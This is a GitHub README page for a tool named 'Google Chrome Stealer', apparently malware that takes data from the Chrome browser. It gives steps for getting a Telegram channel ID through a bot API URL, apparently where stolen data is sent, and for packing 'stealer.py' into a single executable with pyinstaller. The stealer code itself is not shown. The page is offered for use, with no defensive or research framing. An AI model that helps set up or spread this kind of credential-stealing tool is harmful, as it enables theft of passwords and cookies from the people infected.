Skip to content

Latest commit

 

History

History
14 lines (13 loc) · 722 Bytes

README.md

File metadata and controls

14 lines (13 loc) · 722 Bytes

Google Chrome Stealer

To obtain private channel ID:

  1. Convert it to public with some @channelName
  2. Send test message using this URL:
    https://api.telegram.org/bot%TOKEN%/sendMessage?chat_id=@channelName&text=test
  3. As response we will get something like this:
    {"ok": true, "result": {"chat": {"id": %CHANNEL_ID%, "title": "Test Private Channel", "type": "channel"}, "date": 1448245538, "message_id": 7, "text": "test"}}
  4. Now you can convert it back to private and use obtained ID

To compile stealer:

  1. Install pyinstaller using pip
    pip install pyinstaller
  2. Execute following command to compile:
    pyinstaller -F stealer.py